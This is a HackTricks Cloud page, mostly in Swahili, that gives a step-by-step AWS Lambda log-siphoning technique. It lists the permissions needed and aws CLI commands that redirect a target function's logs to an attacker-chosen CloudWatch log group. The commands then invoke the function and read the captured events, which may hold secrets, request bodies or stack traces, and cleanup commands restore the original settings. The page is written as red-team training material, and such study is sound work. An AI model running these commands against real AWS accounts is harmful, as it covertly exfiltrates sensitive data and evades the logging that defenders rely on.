HackTricks CloudAWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Tumia vibaya vigezo vya logging vya hali ya juu vya lambda:UpdateFunctionConfiguration ili kuyaelekeza tena logi za function kwenye CloudWatch Logs log group iliyochaguliwa na mshambuliaji. Hii inafanya kazi bila kubadilisha code au execution role (matawi mengi ya Lambda tayari yanajumuisha logs:CreateLogGroup/CreateLogStream/PutLogEvents kupitia AWSLambdaBasicExecutionRole). Ikiwa function inachapisha secrets/request bodies au inashindwa (crash) na stack traces, unaweza kuzikusanya kutoka kwenye log group mpya.
Ruhusa zinazohitajika
- lambda:UpdateFunctionConfiguration
- lambda:GetFunctionConfiguration
- lambda:InvokeFunction (au kutegemea triggers zilizopo)
- logs:CreateLogGroup (sio lazima mara nyingi ikiwa role ya function ina)
- logs:FilterLogEvents (kusoma events)
Hatua
- Unda sink log group
aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
- Elekeza upya target function logs
aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1
Subiri hadi LastUpdateStatus iwe Successful:
aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text
- Iitisha na usome kutoka kwenye sink
aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
Athari
- Kuelekeza kwa siri application/system logs zote kwenye log group unayodhibiti, ukiepuka matarajio kwamba logs zitafika tu katika
/aws/lambda/<fn>. - Exfiltrate data nyeti zilizochapishwa na function au zilizoonekana katika errors.
Usafishaji
aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
--region us-east-1 || true
Vidokezo
- Udhibiti wa logging ni sehemu ya Lambda’s
LoggingConfig(LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel). - Kwa chaguo-msingi, Lambda hutuma logs kwenye
/aws/lambda/<function>, lakini unaweza kuelekeza kwa jina lolote la log group; Lambda (au execution role) itaunda ikiwa itaruhusiwa.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.